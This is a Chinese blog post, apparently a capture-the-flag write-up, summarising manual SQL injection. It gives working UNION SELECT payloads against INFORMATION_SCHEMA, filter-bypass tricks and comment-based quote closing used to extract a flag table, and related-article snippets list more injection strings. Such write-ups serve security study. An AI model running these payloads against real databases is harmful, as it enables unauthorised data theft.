手工sql注入常规总结

最新推荐文章于 2024-08-03 08:00:00 发布
最新推荐文章于 2024-08-03 08:00:00 发布
阅读量205 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/109273400
版权

1.发现注入点
2.报数据库

先用单引号(也尝试双引号)闭合前面的语句,使注入的语句能够执行,

数字 0 :匹配字段,还有 1=1 1=2 等等都可以使用,有些网站会有过滤处理,建议采用 1%2b1=2 1%2b1>1 绕过过滤

句尾加 # 井号注释后面的语句和原有的引号括号

使用union select 联合查询显示位,返回的数字即为显示位,可以用来显示字段

' and 0 union select 1,2,3 #

在这里插入图片描述
在显示位输入可能的表名,union select语句从数据库 INFORMATION_SCHEMA查询他的columns

' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #在这里插入图片描述
在表名中寻找可能的表,继续用union select 查询表中的column,即本语句中的列名column_name和数据类型data_type
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table
在这里插入图片描述
发现列名有 secret table,继续使用语句查询该列名下
' and 0 union select 1,2,fl4g from secret_table #
在这里插入图片描述
出现flag

强行总结:一般sql注入要先用引号括号等出现报错判断sql注入点
用单引号双引号括号闭合前面,用#或 --注释后面的语句和引号括号
order by
union select 1,2,3,4,5,查询显示位
根据mysql常用的表结构查询表和列

参考mysql常用结构: https://blog.csdn.net/Wu000999/article/details/88996768?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param

b1gpig安全
关注
专栏目录
【网络安全SQL注入原理及常见攻击方法简析
等风来
04-18 6784
因此,攻击者可以在用户名或密码中添加 --,来注释掉后面的字符串,从而绕过过滤器的检测。攻击者不停地尝试不同的SQL语句,观察程序的响应时间,从而判断SQL语句是否正确,进而获取数据库中的敏感信息。该方法的基本原理是,在输入框中输入一个带有单引号的字符串,如果应用程序对输入参数没有进行正确的过滤和转义,则会发生语法错误,进而证明存在 SQL 注入漏洞。基于布尔盲注的SQL注入攻击是一种利用目标Web应用程序对SQL查询条件正确/错误响应的不同表现来推测查询语句的正确性,从而获取数据库中敏感信息的攻击方式。
SQL注入
poorleaves的博客
07-28 477
一、数据库基础 二、SQL注入原理 三、手工注入 四、多样化SQL注入
SQL注入大汇总(逐步细化)
qq_43756450的博客
08-11 710
SQL注入总结基本流程思路一、判断注入点二、判断字段数三、判断回显点四、查询相关内容注入类型及构造语句一、显错注入二、布尔盲注三、HEAD注入四、POST注入五、宽字节注入六、延时注入脚本编写思路 基本流程思路 一、判断注入点 id = 1 加特殊符号与前边符号闭合,尾部加 --+ 或 # 注释掉后面的特殊符号,页面出错 这是参数为字符型才需要引号闭合,如果人家本来就是数字就不用加引号了 单引号:id = 1’ 双引号:id = 1" 以上两种还多一个小括号:id = 1’) 或 id = 1") 如果
sql注入总结
weixin_44232687的博客
11-26 847
sql注入的原理 它是发生在应用程序与数据层的安全漏洞,用自己的话说,就是在输入的字符串中注入sql指令,因为程序设计不当,忽略了对字符的检查,这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 可能带来的危害: 重要资料信息的泄露; 数据库服务器被攻击,系统管理员账户被篡改 获取系统较高的权限后,在网页中加入恶意的连接。 经由上传php简单的指令至对方之主机内,PHP之强大系统命令,可以让黑客进行全面控制系统(例如:php一句话木马)。 企业网站主
干货|SQL注入思路总结(非常详细)零基础入门到精通,收藏这一篇就够 了
最新发布
Python_0011的博客
08-03 798
SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入
常用SQL注入语句大全
cainiao199020的博客
12-23 2766
1.判断有无注入点 整形参数判断 1、直接加’ 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入 字符型判断 1、直接加’ 2、and ‘1’=‘1’ 3、 and ‘1’=‘2’ 搜索型: 关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 如果1、3运行异常 2正常就存在注入 2.猜表一般的表的名称无非是admin ...
mysql 解表_Access MySql常规手工注入
weixin_31109487的博客
02-18 101
(一)1.access注入之联合查询法:单引号判断 错误页面And 1=1 正确页面And 1=2 错误页面Order by xx 查询字段数目Order by 22 正确 order by 23 错误 22个字段数目猜解表名:http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1511 UNION SELECT1,2,3,4,5,6,...
sql手工注入思路
cike_y
08-31 1046
由于手工注入时,经常忘记怎么敲,特意写关于sql注入的常用的注入查询,当作备忘笔记 2022/8/29
SQL注入漏洞挖掘.ppt
10-27
SQL注入是一种常见的网络安全漏洞,它发生在应用程序的动态SQL语句中,允许攻击者通过输入恶意数据来操纵数据库。以下是对SQL注入漏洞的详细说明: ### SQL注入漏洞的易发位置 1. **登录框**:当用户输入的用户名...
浅析SQL注入攻击.pdf
09-19
手工测试比较直观,但分析返回的错误信息和猜测数据库结构信息实施起来比较麻烦,需耗费很多的人力、物力,并且不能保证发现大型系统中所有的SQL注入安全漏洞,因此手工测试方法目前主要应用于较小系统的测试。...
SQL 注入
365的足迹
08-18 537
sql注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1] 比如先前的很多影视网站泄露VIP会员。。。
sql手工注入思路
xhiqe的博客
06-01 617
入坑第一步,给大家分享一下sql手工注入1.先找交互点:一般是url或是搜索框。2.找注入点。3.判断注入类型:用 ' (单引号)。4.判断列数:使用order by5.接着看回显位置:union select6.查询数据库名称 :例如:?id=1 union select 1,database(),37.查询数据表名称 :例如:?id=1 union select 1,table_name,3 from information_schema.tables where table_schema="数据库名称
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2800
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql注入总结笔记
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 2308
文章目录渗透千万条,安全第一条什么是SQLiSQLi危害SQLi分类如何发现SQLi?SQLi的利用步骤?MySQL注释符MySQL基础函数SQL基础语句更改记录URL编码MySQL联合查询注入优先级思路及步骤重点布尔盲注Payload构造思路延时盲注写文件读文件表单注入条件语句中or的认识测试注释步骤insert、update、delete注入报错注入模板原理1——薛定谔之报错注入原理2原理3例子其他模板LIKE注入宽字节注入条件原理dnslog带外查询数据MySQL注入绕过 渗透千万条,安全第一条 WA
sql注入
qq_49714982的博客
04-06 2341
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL手工注入常规用法
OKAY_TC的博客
03-07 487
Mysql5.0版本后 information_schema union select 1,database() //查看数据库 union select 1,group_concat(table_name) from information_schema.tables where table_schema='xx' //查看xx数据库中表名 union select ...
SQL注入常规思路及奇葩技巧
hl1293348082的专栏
04-10 213
最近在看《SQL注入攻击与防御》这本书,看了之后感觉自己之前的视野和格局还是太小了些。SQLi的应用特别广泛,多种web数据库不说,移动安卓端也存在通用的SQLi。而从语言的角度来看~PHP/JAVA/PYTHON/C#等等~都可以与SQLi联系起来,由语言特性而衍生的SQLi种类。最近还听说Javascript也能写后端了,着实把我高兴坏了,看来PHP这“世界上最好的语言”的称号,要换主了~ 同是弱类型语言,这俩哥们怕是要一绝“高低”。 废话说到这里,由于SQLi体系扩展还没有完成,所以在这里算是总结
学习随笔之SQL手工注入总结
tuzi0739的博客
03-23 335
众所周之,SQL注入无非就是两种手段,手工注入sqlmapSQLMAP作为一种工具,比较简单粗暴但有时候,需要用到手工注入来实现效果,或者做题目。我们现在就来讲一下我这段时间所学的手工注入总结吧寻找注入点通过'   以及and 1=1 and 1=2  等字符来判断是否存在注入点然后猜出该字段order by X (猜字段)联合查询php?id=1 union select 1,2,3,X -...
SQL注入常规Fuzz全记录
凡宇
07-18 4441
前言 本篇文章是在做ctf bugku的一道sql 盲注的题(题目地址:注入题目)中运用了fuzz的思路,完整记录整个fuzz的过程,给师傅们当点心,方便大家加深对web sql注入 fuzz的理解。 进入主题 1.访问题目,是个典型的登录框 2.尝试输入admin/123456,提示密码错误,因此可以确定存在用户admin,这里可能会有师傅要爆破了,但这里题目要求sql注入,我们就按...
手工SQL注入教程:检测与利用详解
"手工SQL注入教程,通过不同的URL测试来检测和利用可能的SQL注入漏洞,包括判断数据库类型、表和字段存在性、数据长度以及字符范围等。" 在网络安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值